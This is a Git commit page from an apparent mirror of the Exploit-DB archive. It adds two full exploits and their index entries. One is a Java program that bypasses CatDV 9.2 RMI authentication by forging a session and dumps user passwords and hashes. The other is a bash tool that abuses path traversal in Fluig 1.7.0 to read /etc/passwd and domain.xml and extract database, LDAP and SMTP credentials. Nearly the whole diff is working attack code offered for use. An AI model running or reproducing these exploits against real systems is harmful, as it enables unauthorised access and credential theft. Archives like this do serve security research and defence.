bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-03-06

Browse source 
2 changes to exploits/shellcodes

CatDV 9.2 - RMI Authentication Bypass

Fluig 1.7.0 - Path Traversal
This commit is contained in:
Offensive Security 2021-03-06 05:01:53 +00:00
parent 5572674576
commit c031a43059
3 changed files with 306 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

96
exploits/java/remote/49621.java Normal file
View file

@ -0,0 +1,96 @@
# Exploit Title: CatDV 9.2 - RMI Authentication Bypass
# Date: 3/1/2021
# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
# Vendor Homepage: https://catdv.com/
# Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe
# Version: 9.2 and lower
# Tested on: Windows, Mac
import org.h2.engine.User;
import squarebox.catdv.shared.*;
import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
public class Runnable {
public Runnable() throws RemoteException, NotBoundException, MalformedURLException { }
private static int getValidSession(long createdTime, String claimedHost) {
return (int)createdTime + claimedHost.hashCode();
}
private static void printFields(SField[] fields) {
for (SField field : fields) {
System.out.println(field.fieldDefID);
System.out.println(field.value);
System.out.println(field.fieldDefinition);
}
}
public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException {
String target = "rmi://<HOST>:1099/CatDVServer";
ServerAPI look_up = (ServerAPI) Naming.lookup(target);
System.out.println("Trying to get all connections");
SConnection[] connections = look_up.getConnections();
for (SConnection element : connections) {
System.out.println("Found connection:");
System.out.println("CatDVUser:"+ element.catdvUser);
System.out.println("ApiVersion:"+ element.apiVersion);
System.out.println("User:"+ element.user);
System.out.println("ClaimedHost:"+ element.claimedHost);
System.out.println("ActualHost:"+ element.actualHost);
System.out.println("Created:"+ element.created);
System.out.println("LastUsed:"+ element.lastUsed);
System.out.println("Client features:"+ element.clientFeatures);
System.out.println("\n");
}
System.out.println("Getting system properties");
System.out.println("Running from: "+look_up.getProperty("user.dir"));
System.out.println("Running on: "+look_up.getProperty("os.arch"));
System.out.println("Java version: "+look_up.getProperty("java.version"));
//We can create a new client from most of the fields found in the existing connections which we can dump anonymously
ClientID bob=new ClientID(
connections[0].catdvUser,
connections[0].claimedHost,
getValidSession(connections[0].created,connections[0].claimedHost),
connections[0].created,
"");
System.out.println("\nCreated a new client with parameters: \n" +
"" + "user:"+connections[0].catdvUser+"\n"+
"" + "claimedHost:"+connections[0].claimedHost+"\n"+
"" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+
"" + "created:"+connections[0].created+"\n"+
"" + "pubkey:"+""+
"");
String status = look_up.getStatus(bob);
System.out.println("Status is: \n "+status);
System.out.println("Attempting to dump users: \n");
SUser[] users=look_up.getUsers(bob, -1);
for (SUser element: users) {
System.out.println(element.name);
System.out.println(element.passwordHash);
System.out.println("id:" + element.ID);
System.out.println("realname:" + element.realname);
System.out.println("email:" + element.email);
System.out.println("password:" + element.password);
System.out.println("notes:" + element.notes);
System.out.println("inactive:" + element.inactive);
System.out.println("RoleiD:" + element.roleID);
System.out.println("hash:" + element.passwordHash);
System.out.println("");
}
}
}

208
exploits/multiple/webapps/49622.sh Executable file
View file

@ -0,0 +1,208 @@
# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: <== 1.7.0-210217
# Tested on: 1.7.0-201124
#!/bin/bash
url="$1"
npayload=$2
> payload.txt
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --
function create-payload {
> wordlist.txt
count=1
while [[ $count -le $npayload ]]; do
# WINDOWS PAYLOAD
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
# LINUX PAYLOAD
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
count=$[$count + 1]
done
}
function manual-mode {
while :; do
echo
echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
echo
echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"
echo -e "\033[0;32m -[ target - Set a target\033[0m"
echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"
echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"
echo
echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
if [[ $path == 'info' ]]; then
clear
cat banner
domain-xml
elif [[ $path == 'clear' ]]; then
clear
elif [[ $path == 'target' ]]; then
XmlPayload=''
echo
echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
enum
else
echo
echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
DirPath=$(head -1 payload.txt)
if [[ $DirPath == '' ]]; then
echo
echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
else
curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
echo
echo -e '\033[0;31m'$path'\033[0m'
echo
cat report/$mdr/$mkfile
echo
pwd=$(pwd)
echo
echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
fi
fi
done
}
function domain-xml {
domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
else
echo
echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
echo
echo -e ' \033[0;33m[!] INFORMATION\033[0m'
echo
curl -s -I $url | grep Server
echo
echo -e '\033[0;31mTarget\033[0m'
echo $url
echo
echo -e '\033[0;31mPayload plaintext\033[0m'
echo $XmlPayload | base64 -d
echo
echo
echo -e '\033[0;31mPayload base64 encoded\033[0m'
echo $XmlPayload
echo
echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
echo
echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
echo
echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
echo
echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
echo
manual-mode
fi
}
function enum {
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
mkdir -p report/$mdr
if [[ $url == '' ]]; then
clear
cat banner
echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
manual-mode
elif [[ $npayload == '' ]]; then
npayload=25
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
echo
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
echo
create-payload
else
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
echo
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
create-payload
fi
echo
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
echo
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'
echo
echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
echo
manual-mode
else
param=$(echo $payload | base64 -d | cut -d '.' -f1)
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
echo
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
echo
echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
echo
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
echo
curl -s -I $url | grep Server
echo
echo -e '\033[0;31mTarget\033[0m'
echo $url
echo
echo -e '\033[0;31mPayload plaintext\033[0m'
echo $payload | base64 -d
echo
echo
echo -e '\033[0;31mPayload base64 encoded\033[0m'
echo $payload
echo
fi
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
manual-mode
else
curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
manual-mode
fi
}
enum

2
files_exploits.csv
View file

@ -18392,6 +18392,7 @@ id,file,description,date,author,type,platform,port
49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,
49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,
49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43807,3 +43808,4 @@ id,file,description,date,author,type,platform,port
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,
49622,exploits/multiple/webapps/49622.sh,"Fluig 1.7.0 - Path Traversal",2021-03-05,"Lucas Souza",webapps,multiple,

Can't render this file because it is too large.